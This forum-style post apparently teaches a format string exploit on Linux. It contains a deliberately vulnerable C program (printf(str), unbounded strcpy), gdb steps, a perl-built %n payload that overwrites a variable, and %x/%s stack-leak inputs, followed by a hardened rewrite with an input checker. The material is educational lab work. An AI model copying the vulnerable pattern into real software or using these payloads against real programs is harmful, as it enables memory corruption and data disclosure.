Formatted String Exploit


This is related to Mike's recent post about memory addresses. Okay, I have been messing around with buffer overflows. I have come to find out they are very simple to initiate. This is written for Linux, and it is a "format string" exploit.

Create a program:

#include <stdio.h>
#include <string.h>   /* strcpy */

static int i;         /* the variable the exploit will overwrite */

int main(int argc, char *argv[])
{
    char str[256];
    i = 10;
    if (argc < 2)
        return 1;
    strcpy(str, argv[1]);   /* unbounded copy: a classic buffer overflow */
    printf(str);            /* user input used as the format string: the bug */
    printf("\n variable i now %d\n", i);
    return 0;
}


"printf(str)" is the exploitable code. A person should never use "printf(str);" because it lets the contents of str be interpreted as the format string, no matter what it is. It should have been "printf("%s", str)", which forces str to be printed as a plain string.
After this program is written, compile it, start a debugger, make a.out the debugged file, then get the address of the exploitable variable:

[root@localhost root] gcc test.c
[root@localhost root] gdb
(gdb) file a.out
(gdb) print &i

"i" will now print out something like 0x8123456

This is the memory address of the exploitable variable.
Now you are going to run the program and inject the exploit string. "perl -e" eliminates all non-useful memory stuff (just trust me for now). The "machine code" here is just the memory address, written one byte at a time. Notice it is written as 56 34 12 08 instead of 08 12 34 56: the bytes of the address go in reverse order, because x86 stores addresses little-endian.

Now type this (and keep in mind the difference between ` and ' )

(gdb) run `perl -e 'print "\x56\x34\x12\x08_%x_%x_%x_%n"'`

and bam, your variable i should now have a different, exploited value.




Okay, the above explains very little. To understand more of what's going on, run ./a.out at the command line. It will print whatever you put as the argument.

So doing
./a.out hello
will print out "hello". The exploit comes when you start injecting things like,
./a.out %i
or
./a.out %x


Now here's where the fun starts:
./a.out %x%x%x%x%x%x etcetc %x%x

The more %x's, the more it will print out from the stack. When one of the %x's comes out as "bfffd17" or bffff-something, that indicates a stack address, i.e. something is contained at that memory address. At this point, replace that %x with %s. This will show the contents of the memory as a string (i.e. root directories, paths, file associations, etc). So you may run the program as:

./a.out %x%x%x%x%x%x%x%x%s%s%s%s%s%s%x%x%x%x%x%x


Earlier I mentioned "perl -e". This simply removes all the unneeded places where we injected %x just to see where a viewable string was located.

Now the next step is to find the actual address of what prints out in %s. This will allow you to (in theory) overwrite paths, or other variables in the computer. Hence my question to Mike. I'll play with this more and let you know!
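As an added example (not code from the original post), here is the hardened counterpart of the program above, covering both the "printf("%s", str)" fix and the %x/%s/%n directives discussed afterwards: the argument is copied with a bound and printed through a fixed "%s" format, and a small checker counts printf directives in untrusted input so a program can log or reject it. The function names are my own.

```c
#include <stdio.h>
#include <string.h>

/* Count printf conversion directives in an untrusted string.  "%%" is a
 * literal percent and is not counted; anything else after '%' is parsed
 * as flags, width, precision, length modifier and conversion character,
 * following the printf grammar.  A dangling '%' at the end still counts.
 * Non-zero means the string must never be passed to printf() as a format. */
int count_format_directives(const char *s)
{
    int n = 0;
    while ((s = strchr(s, '%')) != NULL) {
        s++;                                   /* step past the '%' */
        if (*s == '%') { s++; continue; }      /* "%%" is just a '%' */
        while (*s && strchr("-+ #0", *s)) s++; /* flags */
        while (*s == '*' || (*s >= '0' && *s <= '9')) s++;  /* width */
        if (*s == '.') {                       /* precision */
            s++;
            while (*s == '*' || (*s >= '0' && *s <= '9')) s++;
        }
        while (*s && strchr("hlLqjzt", *s)) s++;  /* length modifier */
        n++;                                   /* x, s, n, d ... reached */
        if (*s) s++;
    }
    return n;
}

/* Hardened form of the post's program: bounded copy instead of strcpy,
 * and a fixed "%s" format so "%x" or "%n" in the input stay plain text.
 * Returns what snprintf returns: the length the input would need, so a
 * value >= cap tells the caller the input was truncated. */
int echo_untrusted(const char *arg, char *out, size_t cap)
{
    return snprintf(out, cap, "%s", arg);
}

int main(int argc, char *argv[])
{
    char line[256];
    const char *arg = argc > 1 ? argv[1] : "";
    int directives = count_format_directives(arg);
    if (echo_untrusted(arg, line, sizeof line) >= (int)sizeof line)
        fprintf(stderr, "warning: argument truncated to %zu bytes\n", sizeof line - 1);
    if (directives)
        fprintf(stderr, "warning: argument held %d format directive(s)\n", directives);
    printf("%s\n", line);
    return 0;
}
```

Compiling the original with "gcc -Wformat -Wformat-security" also flags the bare printf(str) at build time, which is the cheapest check of all.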

